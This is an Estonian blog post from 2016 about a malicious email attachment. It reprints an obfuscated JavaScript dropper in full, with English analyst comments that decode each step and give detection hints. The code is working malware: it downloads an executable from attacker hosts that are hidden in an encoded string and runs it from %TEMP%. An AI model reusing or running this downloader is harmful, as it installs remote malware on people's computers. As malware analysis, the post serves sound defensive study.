teisipäev, märts 01, 2016

Väga huvitav skript

Täna saadeti mulle unpayedinvoice.zip ja ma mõtlesin, et vaatan, mis viirusega tegu on. Fail nimega invoice_copy.js sisaldas sellist sisu. Mis te arvate?
Puust ette ja punaseks selgitavad asja lahti digitunni vennad 14. märtsi digitunnis.


// Analyst note: process-launch helper of the dropper.
// Creates a WScript.Shell object and passes the given command string to Run()
// with window style 0x1 and bWaitOnReturn 0x0, so the script does not wait for
// the child process. The only call site (main routine below) passes the path
// of the file it has just saved under %TEMP%.
// Detection hint: wscript.exe / cscript.exe spawning an executable from %TEMP%.
function JRNjcvOci(nRFJaMTEtkN) {
var AyUtpmIg = WScript.CreateObject("Wscript.Shell");
AyUtpmIg.Run(nRFJaMTEtkN, 0x1, 0x0);
}
// Analyst note: returns the expanded "%TEMP%\" path (with trailing backslash).
// The three parameters are never read in the body; the caller passes random
// strings, so they act as decoys only.
function xibHINjNj(eBgKp,cboWC,cyScP) {
// Split yields ["nyiLdf","Xrs","pt.Shell","xzqCzIi","Scri"]; only [4] and [2] are used.
var lHSUW = "nyiLdf Xrs pt.Shell xzqCzIi Scri".split(" ");
// The (1)? ternary is always true, so ElE == "W" + "Scri" + "pt.Shell" == "WScript.Shell".
var ElE=((1)?"W" + lHSUW[4]:"")+lHSUW[2];
var HT = WScript.CreateObject(ElE);
var ih = "%TEMP%\\";
return HT.ExpandEnvironmentStrings(ih);
}
// Analyst note: string-splitting obfuscation of a ProgID.
// The concatenation below evaluates to "Scripting.FileSystemObject"; the name
// is broken into fragments so that it does not appear literally in the file.
function YPTRehyF() {
var qdpvfWq = "ipting";
var woQuoCrNBc = "ile";
var QMXYe = "System";
return "Sc" + "r" + qdpvfWq + ".F" + woQuoCrNBc + QMXYe + "Obj" + "ect";
}
// Analyst note: thin wrapper around WScript.CreateObject(progId).
// In this file it is called with strings that evaluate to "MSXML2.XMLHTTP"
// and "ADODB.Stream" (see the main routine).
function tDct(QtpLn) {
return WScript.CreateObject(QtpLn);
}
// Analyst note: wrapper for obj.write(data).
// The single call site passes the ADODB.Stream object and the HTTP
// responseBody, i.e. it copies the downloaded bytes into the stream.
function MgCR(UtZEp,SOxUA) {
UtZEp.write(SOxUA);
}
// Analyst note: wrapper for obj.open() with no arguments.
// Used on the ADODB.Stream object before the response body is written to it.
function lMOH(gokah) {
gokah.open();
}
// Analyst note: wrapper for obj.saveToFile(path, option).
// 682-680 evaluates to 2; for ADODB.Stream that is adSaveCreateOverWrite,
// so an existing file at the target path is replaced.
function Fxqi(ZJKbg,ofEzE) {
ZJKbg.saveToFile(ofEzE,682-680);
}
// Analyst note: wrapper for request.open(method, url, false).
// Argument order is swapped relative to open(): the second parameter is the
// URL and the third is the HTTP method. The literal false makes the request
// synchronous.
function SZjM(ywnEe,iudkY,PuDkm) {
ywnEe.open(PuDkm,iudkY,false);
}
// Analyst note: returns true when the argument loosely equals 200
// (1035-835 == 200). The call site passes the XMLHTTP status, so this is an
// "HTTP 200 OK" check with the constant hidden behind arithmetic.
function kDfm(aiNgt) {
if (aiNgt == 1035-835){return true;} else {return false;}
}
// Analyst note: returns true when the argument is greater than 191260
// (191622-362). The call site passes the stream size in bytes, so smaller
// responses are not saved. Presumably this filters out error pages or
// placeholder content; the script itself does not say why.
function EBbH(UjHnC) {
if (UjHnC > 191622-362){return true;} else {return false;}
}
// Analyst note: string de-obfuscator.
// Returns a new string made of the characters at odd indices (1, 3, 5, ...)
// of the input, dropping the junk character that precedes each real one.
// The constants reduce to: 533-533 = 0, 738-736 = 2, 433-433 = 0, 291-290 = 1.
function wLgr(ncTyQ) {
var cgpjK="";
// V is assigned without var, so it becomes a global variable.
for(V=(533-533); V < ncTyQ.length; V++)
if (V % (738-736) != (433-433)) {
cgpjK += ncTyQ.substr(V, 291-290);
}
return cgpjK;
}
// Analyst note: wrapper for request.send() with no body.
// Called on the XMLHTTP object right after open(), so this is the point at
// which the outbound HTTP request is actually made.
function OCSS(CzLUk) {
CzLUk.send();
}
// Analyst note: returns the .status property of the given object
// (the HTTP status code of the XMLHTTP request at the call site).
function QwyG(uPQFC) {
return uPQFC.status;
}
// Analyst note: wrapper for new ActiveXObject(progId).
// The only call passes the result of YPTRehyF(), i.e.
// "Scripting.FileSystemObject".
function OeUQd(xbdfsH) {
return new ActiveXObject(xbdfsH);
}
// ---- Analyst walk-through of the main routine (code left byte-identical) ----
// Summary: a Windows Script Host downloader. It decodes a list of hosts,
// creates a working folder under %TEMP%, requests each candidate URL with
// MSXML2.XMLHTTP, writes a sufficiently large HTTP 200 body to disk through
// ADODB.Stream as an .exe, launches it via WScript.Shell.Run and stops at the
// first payload it manages to save.
// Observable behaviour for detection: wscript.exe / cscript.exe making
// outbound HTTP GET requests, creating %TEMP%\VexneEA\, writing 463705.exe
// there and spawning it as a child process.
//
// Db carries one junk character before every real one; wLgr() keeps the
// odd-indexed characters. Decoded and defanged, the space-separated list is:
//   hellowruff[.]com   /80.exe?   thisisitsqq[.]com/80.exe?   ?   ?   ?
// Note that the first host and its path end up as separate entries of A.
var Db="komh1edlMl0oRwwrtumf4fF.ScboEmO T/p8a0n.8eHxmed?B DtHhEifs2iqsBi2t6saqpqO.EcEoxm3/28j03.LekxHe6?l k?X M?T M?";
var A = wLgr(Db).split(" ");
// Jjf = expanded "%TEMP%\"; the three string arguments are ignored by the callee.
var Jjf = xibHINjNj("nzqF","YdSvU","ZAGPHC");
// FkM = Scripting.FileSystemObject.
var FkM = OeUQd(YPTRehyF());
// Working directory: %TEMP%\VexneEA\
var aAIS = Jjf+"VexneEA\\";
// CreateFolder errors (for example the folder already exists) are swallowed.
try{
FkM.CreateFolder(aAIS);
}catch(rFGJNs){
};
// JDs splits into ["2.XMLHTTP","waRZkkS","ooTJO","XML","ream","St","xGZpmyvy","AD","AKYgRrM","OD"];
// the random-looking entries are padding and are never indexed.
var yuR = "2.XMLH";
var JDs = (yuR + "TTP" + " waRZkkS ooTJO XML ream St xGZpmyvy AD AKYgRrM OD").split(" ");
// QOsC == "AD" + "" + "OD" == "ADOD". uX is never read again.
var uX = true  , QOsC = JDs[7] + "" + JDs[9];
// (628815, JDs[0]) is a comma expression that yields JDs[0]; MK = "MSXML2.XMLHTTP".
var MK = tDct("MS"+JDs[3]+(628815, JDs[0]));
// Same trick with (973688, JDs[4]); gul = "ADODB.Stream".
var gul = tDct(QOsC + "B." + JDs[5]+(973688, JDs[4]));
var qyN = 0;
// u is appended to every URL; meCiIvf becomes the saved file's base name.
var u = 1;
var meCiIvf = 463705;
var n=qyN;
// Walk the decoded list A until one entry yields a payload or the list ends.
while (true)  {
if(n>=A.length) {break;}
// Xk is set to 1 once a payload has been accepted in this iteration.
var Xk = 0;
// ROD splits into ["ht","PEFRBeU","tp","wtSLT","JoELKzBC","://","ziQIOOu",".e","xe","G","ET"]:
// [0]+[2]+[5] == "http://", [7]+[8] == ".exe", [9]+[10] == "GET".
var ROD = ("ht" + " PEFRBeU tp wtSLT JoELKzBC :// ziQIOOu .e xe G ET").split(" ");
try  {
// Synchronous GET of "http://" + A[n] + "1"; continue only on status 200.
SZjM(MK,ROD[0]+ROD[2]+ROD[5]+A[n]+u, ROD[9]+ROD[10]); OCSS(MK); if (kDfm(QwyG(MK)))  {    
// Open the stream, set type 1 (binary), copy the response body into it and
// accept it only if it is larger than 191260 bytes (see EBbH).
lMOH(gul); gul.type = 1; MgCR(gul,MK.responseBody); if (EBbH(gul.size))  {
// Rewind and save as %TEMP%\VexneEA\463705.exe; the /*...*/ fragments are junk comments.
Xk = 1; gul.position = 0; Fxqi(gul,/*z6W830ly5m*/aAIS/*OeNt139vh5*/+meCiIvf+ROD[7]+ROD[8]); try  {
// ((new Date())>0,7954910888) is a comma expression whose value is the
// non-zero literal, so this condition is always true.
if (((new Date())>0,7954910888)) {
// Launch the saved file. The break leaves the while loop before gul.close() runs.
JRNjcvOci(aAIS+meCiIvf+/*Yxme15SsMQ*/ROD[7]+ROD[8]/*ig6y53wbkI*/);
break;
}
}
// Errors from launching the file are swallowed.
catch (Vn)  {
};
}; gul.close();
};
// Reached only if the launch above threw: a payload was saved, so stop trying further entries.
if (Xk == 1)  {
qyN = n; break;
};
}
// Any network or stream error is swallowed and the next entry is tried.
catch (Vn)  {
};
n++;
};
